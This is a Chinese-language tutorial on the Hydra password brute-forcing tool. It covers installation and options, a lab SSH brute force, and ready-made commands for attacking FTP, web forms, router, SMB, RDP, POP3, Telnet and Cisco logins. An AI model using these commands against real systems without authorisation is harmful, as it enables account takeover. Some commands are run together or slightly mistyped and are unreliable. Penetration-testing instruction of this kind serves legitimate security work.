暴力破解工具—九頭蛇（hydra）使用詳解及實戰

hydra是著名組織thc的一款開源的暴力破解密碼工具、功能非常強大

kali下是默認安裝的、幾乎支持所有協議的在線破解。

密碼能否破解，在于字典是否強大以及電腦的性能。

我們就介紹下，這個裝備怎么用

首先下載安裝

下載地址：https://github.com/vanhauser-thc/thc-hydra

Hydra：Kali是安全從業人員常用的Linux系統，自帶有大量安全工具集，Hydra自然也集成在里面，工具位置在密碼攻擊—在線攻擊一欄。

Windows中Hydra安裝：

Hydra官方不支持Windows版，需要在GitHub上下載，地址為：

https://github.com/maaaaz/thc-hydra-windows

下載之后解壓縮即可。

使用方法

語法：Hydra 參數 IP 服務

參數：

-l login 小寫，指定用戶名進行破解-L file 大寫，指定用戶的用戶名字典-p pass 小寫，用于指定密碼破解，很少使用，一般采用密碼字典。-P file 大寫，用于指定密碼字典。-e ns 額外的選項，n：空密碼試探，s：使用指定賬戶和密碼試探-M file 指定目標ip列表文件，批量破解。-o file 指定結果輸出文件-f 找到第一對登錄名或者密碼的時候中止破解。-t tasks 同時運行的線程數，默認是16-w time 設置最大超時時間，單位-v / -V 顯示詳細過程-R 恢復爆破（如果破解中斷了，下次執行 hydra -R /path/to/hydra.restore 就可以繼續任務。）-x 自定義密碼。
service：指定服務名，支持的服務跟協議有：telnet，ftp，pop3等等。注意點：1.自己創建字典,然后放在當前的目錄下或者指定目錄。2.參數可以統一放在最后，格式比如hydra ip 服務 參數。3.如果能確定用戶名一項時候，比如web登錄破解，直接用 -l就可以，然后剩余時間破解密碼。4.缺點，如果目標網站登錄時候需要驗證碼就無法破解。5.man hydra最萬能。6.或者hydra -U http-form等查看具體幫助。

案例分析

暴破ssh登錄密碼

環境介紹

攻擊機：kali

裝有hydra工具

靶機：192.168.154.131

安裝ssh服務，正常運行

為了測試方便，我們創建兩個簡單的字典文件，如下：

開始爆破

根據命令參數，組織參數格式如下：

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh

破解成功

因為字典數量比較少，我們可以輕易的破解成功，但是實際情況下，我們可能需要很久。

測試登錄

使用得到的用戶名/密碼登錄服務器，登錄成功

各種協議破解匯總

FTP協議破解

破解ftp：
hydra -L 用戶名字典 -P 密碼字典 -t 6 -e ns IP地址 -v

http協議破解

get方式提交，破解web登錄：
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -v -e ns IP地址 http-get /admin/hydra -L 用戶名字典 -P 密碼字典 -t 線程 -v -e ns -f IP地址 http-get /admin/index.php
post方式提交，破解web登錄：
hydra -f -l 用戶名 -P 密碼字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"
#/index.php …這個是登錄的 url#后門是POST的數據 其中的用戶名密碼使用 USER PASS 來代替#然后是如果登錄出錯 會出現的字符 。。。然后開始破解

https協議破解

破解https
hydra -m /index.php -l 用戶名 -P 密碼字典.txt IP地址 https

路由器破解

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /-l admin 為嘗試破解的用戶名。
# -x 6:10:1a. 表示枚舉的密碼由 數字、小寫字母和單字符’.'等等組成，長度為 6 - 10 位。-t 8 表示分 8 個并行任務進行爆破嘗試。192.168.1.1 為 Router 地址。http-get 為破解方式（協議）

http-proxy協議破解

破解http-proxy：
hydra -l admin -P 字典.txt http-proxy://IP地址

smb破解

破解smb：
hydra -l 用戶名字典 -P 密碼字典 IP地址 smb

 Windows遠程桌面

破解rdp(windows遠程登錄)：
hydra ip地址 rdp -l administrator -P 密碼字典.txt -V

郵箱pop3

破解郵箱pop3：
hydra -l 用戶名 -P 密碼字典.txt my.pop3.mail pop3

telnet破解

hydra ip地址 telnet -l 用戶字典.txt -P 密碼字典.txt -t 32 -s 23 -e ns -f -V

語音通訊工具teamspeak

hydra -l 用戶名字典 -P 密碼字典.txt -s 端口號 -vV ip teamspeak

cisco

hydra -P 密碼字典 IP地址 cisco
hydra -m cloud -P 密碼字典 IP地址 cisco-enabl